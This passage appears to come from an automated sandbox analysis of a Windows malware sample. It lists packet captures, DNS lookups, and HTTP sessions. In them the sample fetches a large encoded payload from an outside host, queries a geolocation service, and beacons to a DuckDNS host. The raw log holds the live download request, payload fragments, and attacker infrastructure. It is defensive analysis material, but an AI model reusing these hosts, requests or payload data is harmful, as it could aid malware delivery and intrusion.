                                                        Sep 25, 2024 09:34:37.797760963 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.797795057 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.797812939 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.797817945 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.797848940 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.797983885 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.798041105 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.799794912 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.799808025 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:37.799830914 CEST49705443192.168.2.5112.137.173.77
                                                        Sep 25, 2024 09:34:37.799837112 CEST44349705112.137.173.77192.168.2.5
                                                        Sep 25, 2024 09:34:42.073338032 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.078320980 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:42.078432083 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.101449013 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.106436968 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:42.685323954 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:42.731337070 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.819467068 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:42.823899984 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.828874111 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:42.828957081 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:42.833723068 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:43.126262903 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:43.127871037 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:43.132707119 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:43.260838985 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:43.311304092 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:43.316493988 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:34:43.321367025 CEST8049707178.237.33.50192.168.2.5
                                                        Sep 25, 2024 09:34:43.321476936 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:34:43.321554899 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:34:43.326375008 CEST8049707178.237.33.50192.168.2.5
                                                        Sep 25, 2024 09:34:43.932843924 CEST8049707178.237.33.50192.168.2.5
                                                        Sep 25, 2024 09:34:43.932990074 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:34:44.001632929 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:44.006467104 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:44.932374954 CEST8049707178.237.33.50192.168.2.5
                                                        Sep 25, 2024 09:34:44.932466030 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:34:45.268613100 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:34:45.270546913 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:34:45.278776884 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:35:15.277971029 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:35:15.280206919 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:35:15.285047054 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:35:45.293329000 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:35:45.294862032 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:35:45.299710989 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:36:15.306989908 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:36:15.308317900 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:36:15.314089060 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:36:33.293972015 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:33.602099895 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:34.285334110 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:35.492643118 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:37.992647886 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:42.805159092 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:36:45.322467089 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:36:45.323796034 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:36:45.328618050 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:36:52.453577042 CEST4970780192.168.2.5178.237.33.50
                                                        Sep 25, 2024 09:37:15.335988998 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:37:15.337449074 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:37:15.342391014 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:37:45.349096060 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:37:45.350837946 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:37:45.357451916 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:38:15.355089903 CEST246849706192.161.184.44192.168.2.5
                                                        Sep 25, 2024 09:38:15.356812000 CEST497062468192.168.2.5192.161.184.44
                                                        Sep 25, 2024 09:38:15.361793995 CEST246849706192.161.184.44192.168.2.5

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 25, 2024 09:34:34.188999891 CEST6118653192.168.2.51.1.1.1
                                                        Sep 25, 2024 09:34:34.535358906 CEST53611861.1.1.1192.168.2.5
                                                        Sep 25, 2024 09:34:41.457039118 CEST5182353192.168.2.51.1.1.1
                                                        Sep 25, 2024 09:34:42.069914103 CEST53518231.1.1.1192.168.2.5
                                                        Sep 25, 2024 09:34:43.305740118 CEST5873853192.168.2.51.1.1.1
                                                        Sep 25, 2024 09:34:43.313144922 CEST53587381.1.1.1192.168.2.5

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Sep 25, 2024 09:34:34.188999891 CEST192.168.2.51.1.1.10x6415Standard query (0)maan2u.comA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 09:34:41.457039118 CEST192.168.2.51.1.1.10x1f88Standard query (0)apostlejob2.duckdns.orgA (IP address)IN (0x0001)false
                                                        Sep 25, 2024 09:34:43.305740118 CEST192.168.2.51.1.1.10xe6b0Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Sep 25, 2024 09:34:34.535358906 CEST1.1.1.1192.168.2.50x6415No error (0)maan2u.com112.137.173.77A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 09:34:42.069914103 CEST1.1.1.1192.168.2.50x1f88No error (0)apostlejob2.duckdns.org192.161.184.44A (IP address)IN (0x0001)false
                                                        Sep 25, 2024 09:34:43.313144922 CEST1.1.1.1192.168.2.50xe6b0No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • maan2u.com
                                                        • geoplugin.net

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549707178.237.33.50802684C:\Windows\SysWOW64\colorcpl.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 25, 2024 09:34:43.321554899 CEST71OUTGET /json.gp HTTP/1.1
                                                        Host: geoplugin.net
                                                        Cache-Control: no-cache
                                                        Sep 25, 2024 09:34:43.932843924 CEST1170INHTTP/1.1 200 OK
                                                        date: Wed, 25 Sep 2024 07:34:43 GMT
                                                        server: Apache
                                                        content-length: 962
                                                        content-type: application/json; charset=utf-8
                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.549705112.137.173.774432780C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-25 07:34:35 UTC163OUTGET /doc/233_Qzzgbhhaaml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                        Host: maan2u.com
                                                        2024-09-25 07:34:36 UTC365INHTTP/1.1 200 OK
                                                        Connection: close
                                                        last-modified: Tue, 24 Sep 2024 23:56:18 GMT
                                                        accept-ranges: bytes
                                                        content-length: 1117948
                                                        date: Wed, 25 Sep 2024 07:34:35 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 6a 4a 53 63 57 47 42 4d 6a 45 52 38 63 45 78 6f 69 4a 78 4d 63 48 41 38 55 48 41 34 68 46 52 59 5a 48 78 63 59 45 78 41 61 45 51 34 65 49 43 45 6e 46 68 38 56 46 43 55 67 46 78 73 66 47 78 4d 62 47 78 55 62 4a 52 67 52 44 69 41 6b 4a 41 34 6c 46 53 63 4f 45 43 63 61 4a 79 55 6b 46 68 77 6d 4a 68 4b 6d 72 71 56 5a 49 36 65 78 53 2f 34 6e 4a 78 51 50 46 52 55 4f 44 68 6f 5a 70 71 36 6c 57 53 4f 6e 73 55 75 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 31 62 31 39 41 34 34 33 4f 6a 43 4d 39 6e 62 35 7a 42 45 54 43 36 58 64 6e 65 4d 57 46 6a 64 48 76 38 44 47 4d 4e 6e 30 50 4d 54 41 51 61 66 30 31 66 4c 63 4a 37 58 67 59 45 79 33 4f 67 7a 6f 2b 5a 4c 2f 30 77 31 4f 39 39 49 52 41 35 39 37 4b 71 6a 7a 41 6a 56 4a 50 73 6e 61 32 50 4a
                                                        Data Ascii: pq6lWSOnsUsjJScWGBMjER8cExoiJxMcHA8UHA4hFRYZHxcYExAaEQ4eICEnFh8VFCUgFxsfGxMbGxUbJRgRDiAkJA4lFScOECcaJyUkFhwmJhKmrqVZI6exS/4nJxQPFRUODhoZpq6lWSOnsUu9y8na2M29z8HU1b19A443OjCM9nb5zBETC6XdneMWFjdHv8DGMNn0PMTAQaf01fLcJ7XgYEy3Ogzo+ZL/0w1O99IRA597KqjzAjVJPsna2PJ
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 47 54 45 54 59 52 65 41 4a 59 38 65 42 79 5a 50 47 65 77 6c 52 52 49 34 45 76 77 53 4c 52 41 66 49 42 77 63 45 43 58 73 33 38 54 6f 67 75 70 48 38 36 6a 31 45 75 67 6d 2b 64 58 6f 77 4f 7a 4e 36 58 62 34 68 2b 39 56 37 51 62 32 51 66 51 7a 36 30 66 31 78 2f 44 46 39 58 76 65 5a 76 74 67 34 4a 54 35 6d 76 47 4b 37 6f 54 6a 55 39 34 42 2b 2b 7a 36 36 65 6f 36 2b 44 2f 67 4e 2b 79 32 39 42 76 30 36 66 6e 66 38 37 44 64 74 2f 4b 2f 2b 38 37 79 62 65 6c 7a 36 58 54 63 51 66 52 49 36 69 6a 69 49 4f 62 76 39 37 62 69 6f 4d 48 55 7a 57 36 2b 79 48 33 55 47 35 49 54 43 51 30 73 46 6a 77 61 50 78 69 35 46 42 67 5a 73 41 32 7a 48 37 63 6c 31 52 33 4a 45 6d 67 65 5a 78 6c 34 47 59 30 5a 66 42 63 41 4a 31 51 54 56 68 34 32 49 69 30 6e 71 69 57 6e 44 63 41 62 32 43 68
                                                        Data Ascii: GTETYReAJY8eByZPGewlRRI4EvwSLRAfIBwcECXs38TogupH86j1Eugm+dXowOzN6Xb4h+9V7Qb2QfQz60f1x/DF9XveZvtg4JT5mvGK7oTjU94B++z66eo6+D/gN+y29Bv06fnf87Ddt/K/+87ybelz6XTcQfRI6ijiIObv97bioMHUzW6+yH3UG5ITCQ0sFjwaPxi5FBgZsA2zH7cl1R3JEmgeZxl4GY0ZfBcAJ1QTVh42Ii0nqiWnDcAb2Ch
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 31 4e 48 54 31 4e 4b 2f 31 4e 72 58 77 64 62 59 7a 64 44 5a 7a 39 4c 43 76 37 2f 4a 32 72 37 62 7a 4d 75 2f 32 64 58 42 32 73 33 56 31 64 54 56 79 39 6a 51 30 73 43 38 77 39 4c 4c 32 38 62 53 30 4d 6e 5a 79 63 75 38 31 64 54 4b 79 74 47 39 79 38 6e 56 32 4d 32 39 30 4d 48 55 7a 64 6d 2b 79 63 33 62 31 4e 48 4d 32 39 4b 2f 32 39 58 58 77 64 6e 58 7a 64 48 57 30 4e 4b 6d 77 4d 43 34 4c 72 6e 55 4d 34 48 71 31 6a 47 4a 37 4e 4b 68 48 4e 6e 61 79 37 4c 50 7a 63 4c 72 76 63 32 72 4e 37 6e 4e 6f 6a 79 66 78 76 67 78 71 4e 75 31 4b 61 6e 43 79 37 6a 61 31 79 43 41 79 37 37 55 69 4e 6d 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 72 42 67 4e 4c 61 55 4a 54 61 78 4e 6e 4f 30 37 2b
                                                        Data Ascii: 1NHT1NK/1NrXwdbYzdDZz9LCv7/J2r7bzMu/2dXB2s3V1dTVy9jQ0sC8w9LL28bS0MnZycu81dTKytG9y8nV2M290MHUzdm+yc3b1NHM29K/29XXwdnXzdHW0NKmwMC4LrnUM4Hq1jGJ7NKhHNnay7LPzcLrvc2rN7nNojyfxvgxqNu1KanCy7ja1yCAy77UiNm+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2drBgNLaUJTaxNnO07+
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 32 4d 33 43 7a 77 57 2f 30 75 2f 67 34 39 4b 75 52 61 6e 54 75 45 65 7a 31 4c 52 47 72 4e 59 4e 43 4c 6a 5a 71 42 66 41 76 2b 67 62 71 4c 37 31 54 4a 36 2f 36 2b 71 76 32 72 62 33 72 64 54 56 55 64 66 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 31 64 51 41 30 64 45 71 49 42 37 56 32 4b 61 39 30 4c 55 51 7a 74 6d 2b 36 63 33 62 31 4f 48 4d 32 39 4b 69 32 39 58 58 6f 64 6e 58 7a 66 66 57 30 4e 4b 37 77 4d 43 67 73 36 6a 55 7a 46 47 2f 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4d 33 4c 54 64 4c 4e 44 53 4d 62 78 73 75 38 32 74 73 66 55 72 54 43 34 2f 32 76 31 36 41 6d 71 62 37 73 57 4c 4c 42 34 78 32 77 32 2f 74 61 73 73 32 2f 32 39 72 59 71 4b 2b 78 30 74 41 41 30 4e 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58
                                                        Data Ascii: 2M3CzwW/0u/g49KuRanTuEez1LRGrNYNCLjZqBfAv+gbqL71TJ6/6+qv2rb3rdTVUdfP0sC8vNLL28nS0MnWycu81dQA0dEqIB7V2Ka90LUQztm+6c3b1OHM29Ki29XXodnXzffW0NK7wMCgs6jUzFG/2dXB1c3V1dvVy9jP0sC8vM3LTdLNDSMbxsu82tsfUrTC4/2v16Amqb7sWLLB4x2w2/tass2/29rYqK+x0tAA0NLCwL/J2sHbzMvA2dX
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c
                                                        Data Ascii: ycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9L
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b
                                                        Data Ascii: 0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 51 30 63 7a 2b 4f 7a 33 4e 50 6f 77 51 74 68 42 50 6a 54 68 45 52 38 58 4a 45 44 53 30 45 42 43 4e 65 33 38 4c 64 35 48 4e 71 2b 39 73 73 6e 61 47 55 51 78 52 44 48 68 4f 45 49 77 4c 6a 67 39 50 7a 37 4d 39 4e 4b 2f 4d 6b 46 48 4f 6b 6e 64 4f 45 52 49 53 44 55 33 4d 7a 44 4a 2b 38 45 38 36 44 6f 73 48 45 6b 61 51 75 6f 32 33 64 76 2b 79 39 67 39 51 66 56 48 4d 69 73 73 33 45 72 71 30 49 7a 57 4f 53 77 34 4e 30 45 4f 2f 44 77 2b 4f 53 35 49 75 55 45 57 53 50 59 31 35 64 5a 4c 79 54 31 42 51 44 4a 4a 4a 45 50 38 4f 45 70 41 4d 55 64 47 4f 6a 34 66 53 4f 55 2f 2b 4c 2b 50 32 73 46 44 53 54 6b 50 52 52 34 32 34 69 37 64 31 51 76 56 37 6b 6f 73 35 30 4d 79 46 55 50 73 4f 50 48 53 68 4d 6c 45 4c 76 77 36 33 42 59 75 4c 67 38 78 46 43 37 64 4f 65 57 39 43 63 46
                                                        Data Ascii: Q0cz+Oz3NPowQthBPjThER8XJEDS0EBCNe38Ld5HNq+9ssnaGUQxRDHhOEIwLjg9Pz7M9NK/MkFHOkndOERISDU3MzDJ+8E86DosHEkaQuo23dv+y9g9QfVHMiss3Erq0IzWOSw4N0EO/Dw+OS5IuUEWSPY15dZLyT1BQDJJJEP8OEpAMUdGOj4fSOU/+L+P2sFDSTkPRR424i7d1QvV7kos50MyFUPsOPHShMlELvw63BYuLg8xFC7dOeW9CcF
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 7a 39 4c 43 46 6d 73 33 32 68 56 76 52 4d 76 41 32 64 54 42 31 63 33 56 31 64 76 56 79 39 67 72 64 6b 69 38 47 36 36 54 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 6c 74 70 75 38 6e 61 32 42 4f 39 7a 38 48 55 30 74 6e 42 78 73 33 55 31 4e 48 4d 31 4e 4b 2f 32 78 32 74 73 64 6e 59 7a 64 44 57 4b 33 62 6c 77 42 74 64 75 73 48 62 7a 4d 72 41 32 64 58 42 31 63 33 56 31 64 73 68 58 36 6a 50 4a 61 71 73 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 76 76 4b 79 73 36 39 79 38 6e 61 48 51 7a 65 7a 78 69 35 74 64 59 5a 4e 36 58 55 49 7a 2f 4d 31 4e 4b 2b 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 38 4f 41 4d 48 62 7a 4d 75 72 32 53 46 6f 56 4d 30 6b 70 61 66 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54
                                                        Data Ascii: z9LCFms32hVvRMvA2dTB1c3V1dvVy9grdki8G66T28nS0MnWycu82tTKyltpu8na2BO9z8HU0tnBxs3U1NHM1NK/2x2tsdnYzdDWK3blwBtdusHbzMrA2dXB1c3V1dshX6jPJaqsvNLL28nS0MnWycu82vvKys69y8naHQzezxi5tdYZN6XUIz/M1NK+29rXwdnYzdDWz9LCwL8OAMHbzMur2SFoVM0kpafVy9jP0sC8vNLL28nS0MnWycu82tT
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 52 67 56 49 53 6b 68 49 52 38 55 44 78 34 72 4b 42 59 61 47 69 67 50 48 77 30 6f 4a 67 30 6b 44 51 38 61 49 43 49 51 45 46 73 5a 44 77 30 67 48 69 6b 5a 4b 78 58 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6e 59 7a 64 44 57 7a 39 4c 43 77 4c 2f 4a 32 73 48 62 7a 4d 76 41 32 64 58 42 31 63 33 56 31 64 76 56 79 39 6a 50 30 73 43 38 76 4e 4c 4c 32 38 6e 53 30 4d 6e 57 79 63 75 38 32 74 54 4b 79 73 36 39 79 38 6e 61 32 4d 32 39 7a 38 48 55 7a 64 61 2b 79 63 33 55 31 4e 48 4d 31 4e 4b 2f 32 39 72 58 77 64 6b 65 4b 53 59 6b 4b 79 67 59 4a 78 73 4e 49 42 55 66 4b 67 38 57 48 53 45 56 49 53 6b 68 49 52 38 68 44 78 34 72 4b 42 59 61 47 69 67
                                                        Data Ascii: 1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2RgVISkhIR8UDx4rKBYaGigPHw0oJg0kDQ8aICIQEFsZDw0gHikZKxXUzda+yc3U1NHM1NK/29rXwdnYzdDWz9LCwL/J2sHbzMvA2dXB1c3V1dvVy9jP0sC8vNLL28nS0MnWycu82tTKys69y8na2M29z8HUzda+yc3U1NHM1NK/29rXwdkeKSYkKygYJxsNIBUfKg8WHSEVISkhIR8hDx4rKBYaGig
                                                        2024-09-25 07:34:36 UTC16384INData Raw: 7a 2f 58 55 51 64 59 7a 79 55 72 55 50 64 48 4d 31 4e 4b 2f 4e 64 70 44 77 54 37 59 50 64 42 46 7a 7a 37 43 4d 4c 2f 77 32 68 62 62 72 4d 76 31 32 55 4c 42 53 63 31 46 31 54 7a 56 37 74 67 2f 30 68 6d 38 51 4e 4c 6a 32 78 33 53 47 4d 6e 66 79 64 79 38 33 74 54 38 79 6b 4b 39 4d 4d 6b 67 32 4b 32 39 51 4d 45 31 7a 55 53 2b 4d 4d 31 44 31 45 48 4d 74 64 4a 42 32 78 54 58 4a 4e 6e 59 7a 66 44 57 51 55 4d 32 77 4c 2f 4a 53 44 44 65 4c 54 66 31 33 54 34 74 50 6b 49 2f 46 74 76 56 71 78 4a 42 51 2f 63 35 47 4c 4c 76 33 79 35 46 51 79 72 57 79 63 75 38 53 45 48 75 4f 38 36 39 79 38 6b 2b 50 65 59 32 51 55 49 39 36 44 73 77 4d 71 33 68 53 6b 5a 44 46 62 4c 37 53 6a 31 49 4e 72 72 59 53 6b 4e 49 53 45 55 33 4c 4c 38 78 52 42 72 62 7a 43 6c 48 32 64 56 49 2b 63 31
                                                        Data Ascii: z/XUQdYzyUrUPdHM1NK/NdpDwT7YPdBFzz7CML/w2hbbrMv12ULBSc1F1TzV7tg/0hm8QNLj2x3SGMnfydy83tT8ykK9MMkg2K29QME1zUS+MM1D1EHMtdJB2xTXJNnYzfDWQUM2wL/JSDDeLTf13T4tPkI/FtvVqxJBQ/c5GLLv3y5FQyrWycu8SEHuO869y8k+PeY2QUI96DswMq3hSkZDFbL7Sj1INrrYSkNISEU3LL8xRBrbzClH2dVI+c1


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:03:34:32
                                                        Start date:25/09/2024
                                                        Path:C:\Users\user\Desktop\XjPA2pnUhC.exe
                                                        Wow64 process (32bit):true
